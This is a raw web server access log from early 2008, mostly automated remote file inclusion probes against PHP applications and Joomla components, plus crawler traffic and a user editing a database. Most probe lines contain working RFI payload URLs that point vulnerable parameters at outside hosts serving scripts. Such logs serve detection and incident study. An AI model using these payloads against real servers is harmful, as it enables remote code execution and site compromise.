161.58.198.111 - - [02/Jan/2008:10:44:51 -0800] "GET //reports/phpsecurityadmin/include/logout.php?PSA_PATH=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [02/Jan/2008:10:44:52 -0800] "GET /logs//reports/phpsecurityadmin/include/logout.php?PSA_PATH=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [02/Jan/2008:10:44:54 -0800] "GET /logs/access_071219.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [02/Jan/2008:10:44:54 -0800] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [02/Jan/2008:10:44:54 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.217.130 - - [02/Jan/2008:10:45:11 -0800] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.217.130 - - [02/Jan/2008:10:45:11 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.217.130 - - [02/Jan/2008:10:45:11 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
161.58.198.111 - - [02/Jan/2008:10:45:53 -0800] "GET /logs/access_071214.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.11.122 - - [02/Jan/2008:10:45:57 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://www.midsouthhomebuyersweb.com//modules/Forums/main.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.11.122 - - [02/Jan/2008:10:46:06 -0800] "GET /logs/access_071221.log/convert/mvcw.php?step=1&vwar_root=http://www.midsouthhomebuyersweb.com//modules/Forums/main.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.147.58 - - [02/Jan/2008:10:46:14 -0800] "GET /send_reminders.php?noSet=0&includedir=http://www.auto-bmc.com/abmc/catalog/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.11.122 - - [02/Jan/2008:10:46:23 -0800] "GET /logs/access_071224.log/convert/mvcw.php?step=1&vwar_root=http://www.midsouthhomebuyersweb.com//modules/Forums/main.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.147.58 - - [02/Jan/2008:10:46:48 -0800] "GET /logs/access_071214.log/send_reminders.php?noSet=0&includedir=http://www.auto-bmc.com/abmc/catalog/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.147.58 - - [02/Jan/2008:10:46:48 -0800] "GET /send_reminders.php?noSet=0&includedir=http://www.auto-bmc.com/abmc/catalog/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.147.58 - - [02/Jan/2008:10:46:48 -0800] "GET /logs/send_reminders.php?noSet=0&includedir=http://www.auto-bmc.com/abmc/catalog/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.147.58 - - [02/Jan/2008:10:46:53 -0800] "GET /logs/access_071220.log/send_reminders.php?noSet=0&includedir=http://www.auto-bmc.com/abmc/catalog/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
161.58.198.111 - - [02/Jan/2008:10:46:58 -0800] "GET /logs/access_071214.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [02/Jan/2008:10:47:06 -0800] "GET /logs/access_071214.log//reports/phpsecurityadmin/include/logout.php?PSA_PATH=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [02/Jan/2008:10:47:10 -0800] "GET /logs/access_071205.log//reports/%3Cwbr%20/phpsecurityadmin/include/logout.php?PSA_PATH=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [02/Jan/2008:10:47:10 -0800] "GET /logs/access_071205.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [02/Jan/2008:10:49:32 -0800] "GET /logs/access_071205.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.126 - - [02/Jan/2008:10:50:34 -0800] "GET /minamijewelry/ HTTP/1.0" 200 2094 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
161.58.198.111 - - [02/Jan/2008:10:50:50 -0800] "GET /logs/access_071205.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [02/Jan/2008:10:50:58 -0800] "GET /logs/access_071205.log//reports/phpsecurityadmin/include/logout.php?PSA_PATH=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.163.232 - - [02/Jan/2008:10:55:00 -0800] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.223.48.231 - - [02/Jan/2008:10:55:08 -0800] "GET /logs/access_071214.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.223.48.231 - - [02/Jan/2008:10:55:08 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.223.48.231 - - [02/Jan/2008:10:55:09 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.126 - - [02/Jan/2008:10:55:17 -0800] "GET /mobileoffice/?D=D HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.106.163.232 - - [02/Jan/2008:10:58:57 -0800] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [02/Jan/2008:10:58:57 -0800] "GET //reports/%3Cwbr%20/phpsecurityadmin/include/logout.php?PSA_PATH=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.142.212.185 - - [02/Jan/2008:10:59:22 -0800] "GET /retreat1/IMG_2723.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [02/Jan/2008:10:59:42 -0800] "GET /retreat1/IMG_2747.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [02/Jan/2008:11:00:03 -0800] "GET /retreat1/IMG_2743.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
87.106.163.232 - - [02/Jan/2008:11:00:57 -0800] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [02/Jan/2008:11:01:43 -0800] "GET //reports/phpsecurityadmin/include/logout.php?PSA_PATH=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.163 - - [02/Jan/2008:11:04:29 -0800] "GET /plans/A2_MASTER_SUITE_PLAN.pdf HTTP/1.0" 200 2297833 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.106.163.232 - - [02/Jan/2008:11:06:08 -0800] "GET /logs/access_071219.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [02/Jan/2008:11:06:09 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.8.232.250 - - [02/Jan/2008:11:06:17 -0800] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 401 395 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [02/Jan/2008:11:06:20 -0800] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 200 33010 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [02/Jan/2008:11:06:20 -0800] "GET /warboard/css/styles_screen.css HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [02/Jan/2008:11:06:21 -0800] "GET /warboard/css/styles_print.css HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [02/Jan/2008:11:06:21 -0800] "GET /warboard/images/delete.gif HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [02/Jan/2008:11:06:21 -0800] "GET /warboard/images/update.gif HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [02/Jan/2008:11:06:21 -0800] "GET /warboard/images/details.gif HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [02/Jan/2008:11:06:24 -0800] "GET /warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=574 HTTP/1.1" 200 7615 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
87.106.46.84 - - [02/Jan/2008:11:06:44 -0800] "GET /logs/access_071219.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [02/Jan/2008:11:06:45 -0800] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [02/Jan/2008:11:06:45 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.8.232.250 - warboard [02/Jan/2008:11:06:57 -0800] "POST /warboard/index.php?table_name=warboard_main&page=0&function=update&where_field=dataid&where_value=574 HTTP/1.1" 302 2906 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=574" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [02/Jan/2008:11:06:57 -0800] "GET /warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=574&just_updated=1 HTTP/1.1" 200 7657 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=574" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [02/Jan/2008:11:07:00 -0800] "GET /warboard/index.php?table_name=warboard_main HTTP/1.1" 200 32998 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=574&just_updated=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [02/Jan/2008:11:07:04 -0800] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC HTTP/1.1" 200 32960 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [02/Jan/2008:11:07:05 -0800] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 200 33008 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [02/Jan/2008:11:07:11 -0800] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=1&order=FileNum&order_type=DESC HTTP/1.1" 200 32965 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [02/Jan/2008:11:07:15 -0800] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=2&order=FileNum&order_type=DESC HTTP/1.1" 200 33024 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=1&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
87.106.46.84 - - [02/Jan/2008:11:07:21 -0800] "GET /logs/access_071219.log//reports/%3Cwbr%20/phpsecurityadmin/include/logout.php?PSA_PATH=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [02/Jan/2008:11:07:21 -0800] "GET //reports/%3Cwbr%20/phpsecurityadmin/include/logout.php?PSA_PATH=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [02/Jan/2008:11:07:21 -0800] "GET /logs//reports/%3Cwbr%20/phpsecurityadmin/include/logout.php?PSA_PATH=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [02/Jan/2008:11:07:51 -0800] "GET /logs/access_071219.log//reports/phpsecurityadmin/include/logout.php?PSA_PATH=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [02/Jan/2008:11:07:52 -0800] "GET //reports/phpsecurityadmin/include/logout.php?PSA_PATH=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [02/Jan/2008:11:07:52 -0800] "GET /logs//reports/phpsecurityadmin/include/logout.php?PSA_PATH=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [02/Jan/2008:11:07:54 -0800] "GET /logs/access_071219.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [02/Jan/2008:11:07:54 -0800] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [02/Jan/2008:11:07:55 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [02/Jan/2008:11:08:43 -0800] "GET /logs/access_071219.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [02/Jan/2008:11:08:43 -0800] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [02/Jan/2008:11:08:44 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.58.134.215 - - [02/Jan/2008:11:08:54 -0800] "GET /logs/access_071220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.134.215 - - [02/Jan/2008:11:08:54 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.134.215 - - [02/Jan/2008:11:08:54 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.163.232 - - [02/Jan/2008:11:09:37 -0800] "GET /logs/access_071219.log//reports/%3Cwbr%20/phpsecurityadmin/include/logout.php?PSA_PATH=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [02/Jan/2008:11:09:37 -0800] "GET /logs//reports/%3Cwbr%20/phpsecurityadmin/include/logout.php?PSA_PATH=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [02/Jan/2008:11:10:00 -0800] "GET /logs/access_071214.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.58.134.215 - - [02/Jan/2008:11:10:15 -0800] "GET /logs/access_071212.log/spaw_control.class.php?spaw_root=http://www.auto-bmc.com/abmc/catalog/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.134.215 - - [02/Jan/2008:11:10:16 -0800] "GET /spaw_control.class.php?spaw_root=http://www.auto-bmc.com/abmc/catalog/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.134.215 - - [02/Jan/2008:11:10:16 -0800] "GET /logs/spaw_control.class.php?spaw_root=http://www.auto-bmc.com/abmc/catalog/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.46.84 - - [02/Jan/2008:11:10:37 -0800] "GET /logs/access_071214.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.58.134.215 - - [02/Jan/2008:11:10:50 -0800] "GET /logs/access_071218.log/spaw_control.class.php?spaw_root=http://www.auto-bmc.com/abmc/catalog/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.46.84 - - [02/Jan/2008:11:10:56 -0800] "GET /logs/access_071214.log//reports/%3Cwbr%20/phpsecurityadmin/include/logout.php?PSA_PATH=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [02/Jan/2008:11:10:57 -0800] "GET /logs/access_071219.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [02/Jan/2008:11:10:57 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.234.186.170 - - [02/Jan/2008:11:10:59 -0800] "GET /logs/access_071212.log/spaw_control.class.php?spaw_root=http://webignite.net/images/klenk.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
216.234.186.170 - - [02/Jan/2008:11:11:00 -0800] "GET /spaw_control.class.php?spaw_root=http://webignite.net/images/klenk.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
216.234.186.170 - - [02/Jan/2008:11:11:00 -0800] "GET /logs/spaw_control.class.php?spaw_root=http://webignite.net/images/klenk.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
87.106.46.84 - - [02/Jan/2008:11:11:09 -0800] "GET /logs/access_071214.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [02/Jan/2008:11:11:32 -0800] "GET /logs/access_071214.log//reports/phpsecurityadmin/include/logout.php?PSA_PATH=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.234.186.170 - - [02/Jan/2008:11:11:45 -0800] "GET /logs/access_071218.log/spaw_control.class.php?spaw_root=http://webignite.net/images/klenk.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
207.58.134.215 - - [02/Jan/2008:11:12:04 -0800] "GET /spaw_control.class.php?spaw_root=http://www.auto-bmc.com/abmc/catalog/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.46.84 - - [02/Jan/2008:11:12:22 -0800] "GET /logs/access_071214.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [02/Jan/2008:11:14:32 -0800] "GET /logs/access_071214.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.197.170.165 - - [02/Jan/2008:11:16:50 -0800] "GET /displayCategory.php?basepath=http://www.auto-bmc.com/abmc/catalog/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.61.30.100 - - [02/Jan/2008:11:16:58 -0800] "GET /logs/index.php?option=com_sociolize&Itemid=&mosConfig_absolute_path=http://arnoldo.info/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
69.61.30.100 - - [02/Jan/2008:11:16:59 -0800] "GET /index.php?option=com_sociolize&Itemid=&mosConfig_absolute_path=http://arnoldo.info/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
66.197.170.165 - - [02/Jan/2008:11:18:06 -0800] "GET /logs/access_071224.log/displayCategory.php?basepath=http://www.auto-bmc.com/abmc/catalog/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.197.170.165 - - [02/Jan/2008:11:18:06 -0800] "GET /displayCategory.php?basepath=http://www.auto-bmc.com/abmc/catalog/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.197.170.165 - - [02/Jan/2008:11:18:06 -0800] "GET /logs/displayCategory.php?basepath=http://www.auto-bmc.com/abmc/catalog/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.15.104.155 - - [02/Jan/2008:11:18:52 -0800] "GET /logs/access_071224.log/displayCategory.php?basepath=http://webignite.net/images/klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.15.104.155 - - [02/Jan/2008:11:18:52 -0800] "GET /displayCategory.php?basepath=http://webignite.net/images/klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.15.104.155 - - [02/Jan/2008:11:18:52 -0800] "GET /logs/displayCategory.php?basepath=http://webignite.net/images/klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.65.64 - - [02/Jan/2008:11:20:00 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://bobatka.info/modules/language/asc/asc/r7????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.65.64 - - [02/Jan/2008:11:20:00 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://bobatka.info/modules/language/asc/asc/r7????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.65.64 - - [02/Jan/2008:11:20:00 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://bobatka.info/modules/language/asc/asc/r7????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.126 - - [02/Jan/2008:11:22:29 -0800] "GET /plans/A4_SCHEMAIC_SECTION.pdf HTTP/1.0" 200 1814141 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
219.93.191.226 - - [02/Jan/2008:11:26:42 -0800] "GET /logs/access_071205.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://ecology.brave.freealoja.com.pt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
